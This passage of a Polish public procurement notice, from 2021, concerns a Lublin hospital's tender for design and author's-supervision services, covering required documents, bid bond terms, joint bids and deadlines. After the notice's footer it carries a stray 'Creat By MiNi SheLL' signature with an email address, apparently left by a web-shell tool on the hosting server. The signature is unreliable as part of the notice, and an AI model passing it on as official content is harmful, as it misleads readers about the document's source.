lub są wykonywane, oraz załączeniem dowodów określających, <br/>czy te usługi zostały wykonane lub są wykonywane należycie - sporządzony zgodnie z załącznikiem <br/>nr 5 do SWZ.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz <br/>którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są <br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal <br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy;<br/>b. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z <br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - sporządzony zgodnie z załącznikiem nr 6 do SWZ.;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Prawidłowo wypełniony Formularz oferty, sporządzony wg wzoru stanowiącego Załącznik nr <br/>2 do SWZ;<br/>1.2. Prawidłowo uzupełniony Formularz cenowy, zgodnie z załącznikiem nr 2 do SWZ;<br/>1.3. W celu dokonania oceny oferty złożonej przez Wykonawcę w zakresie kryteriów oceny ofert <br/>wskazanych w Rozdz. XIX, Wykonawca ma obowiązek złożenia wraz z ofertą Wykazu osób (wg <br/>zał. nr 6 do SWZ), uzupełnionego co najmniej w zakresie koniecznym do oceny, czy osoba <br/>wskazana w Wykazie spełnia wymogi Zamawiającego określone w Rozdz. IX pkt. 1.4 SWZ oraz <br/>legitymuje się doświadczeniem ocenianym w ramach kryterium pozacenowego (zgodnie z Rozdz. <br/>XIX).<br/>1.4. pełnomocnictwo określające zakres umocowania oraz podpisane przez osoby uprawnione do <br/>reprezentowania Wykonawcy – jeżeli Wykonawcę ubiegającego się o udzielenie zamówienia <br/>reprezentuje pełnomocnik;<br/>1.5. pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia – o ile dotyczy.<br/>1.6. Dowód wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości 8 424,00 zł.<br/>2. Wadium może być wniesione w następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 <br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości;<br/>3. W przypadku składania przez Wykonawcę wadium w formie innej niż w pieniądzu, gwarancja <br/>lub poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać <br/>następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy, w przypadku Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia - co najmniej jednego z współwykonawców), beneficjenta gwarancji <br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz <br/>wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>3) kwotę gwarancji,<br/>4) termin ważności gwarancji, obejmujący co najmniej okres związania ofertą,<br/>5) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie <br/>Zamawiającego w sytuacjach, gdy:<br/>a. Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn <br/>leżących po jego stronie, nie złożył podmiotowych środkówów dowodowych lub przedmiotowych środków <br/>dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o <br/>którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie <br/>omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej <br/>przez Wykonawcę jako najkorzystniejszej .<br/>b. Wykonawca, którego ofertę wybrano:<br/>1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;<br/>2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po <br/>stronie Wykonawcy, którego oferta została wybrana<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:<br/>PKO BP S.A. XVII DOKK. 52 1440 1101 0000 0000 0939 4028, <br/>tytuł przelewu: „Wadium - WSS SP ZOZ DZP 382.39.2021” <br/>5. Do oferty należy dołączyć dowód wniesienia wadium. Na poleceniu przelewu powinien być <br/>umieszczony tytuł:<br/>„Wadium do przetargu Nr postępowania WSS SP ZOZ DZP 382.39.2021<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje <br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7. Wadium należy wnieść przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia <br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art.98 ust.1 pkt 2 i 3 oraz <br/>ust. 2, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający Nr postępowania WSS SP ZOZ DZP 382.39.2021<br/>SWZ 18/26<br/>będzie uważał za skuteczne wówczas, gdy bank prowadzący rachunek Zamawiającego <br/>potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert (tj. przed datą i <br/>godziną wyznaczoną do składania ofert). W wymienionym przypadku dołączenie do oferty kopii <br/>polecenia przelewu zleconego przez Wykonawcę lub dokumentu poświadczającego dokonanie przelewu <br/>jest warunkiem niewystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia <br/>wadium przez Wykonawcę;<br/>8. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma <br/>wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w <br/>przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/><br/>Szczegółowe informacje dot. wadium znajdują się w SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy <br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia <br/>umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o <br/>których mowa w Rozdziale XI ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają <br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców <br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia uzupełniają punkt 16 Formularza <br/>ofertowego – Załącznik nr 2 do SWZ, z którego wynika, które usługi wykonają poszczególni wykonawcy <br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy <br/>regulującej współpracę tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektem umowy stanowiącym załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa Zamawiającego https://szpital-lublin.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-11 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> TERMIN WYKONANIA ZAMÓWIENIA<br/>Etap IA – 20 dni od daty zawarcia umowy.<br/>Etap IB – 120 dni od daty zawarcia umowy<br/>Etap IC – 120 dni od daty zawarcia umowy<br/>Etap II - udział w charakterze biegłego w postępowaniu (postępowaniach) o udzielenie zamówienia <br/>publicznego na wykonanie robót budowlanych na podstawie wykonanej dokumentacji projektowej ( okres <br/>przygotowania procedury przetargowej do dnia wyboru Wykonawcy robót budowlanych).<br/>Etap III - sprawowanie nadzoru autorskiego w rozumieniu art. 20 ust. 1 pkt 4 ustawy z dnia 7 lipca 1994 r. <br/>Prawo budowlane (tekst jednolity: Dz. U. z 2020 r., poz. 1333 ), nad realizacją robót budowlanych objętych <br/>wykonanym projektem (w okresie od dnia zawarcia umowy z wykonawcą robót budowlanych do daty <br/>podpisania protokołu odbioru końcowego robót budowlanych, a w przypadku stwierdzenia wad <br/>w przedmiocie odbioru – do dnia podpisania protokołu stwierdzającego usunięcie wad; (przewidywany <br/>okres realizacji robót budowlanych do końca grudnia 2023 roku).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com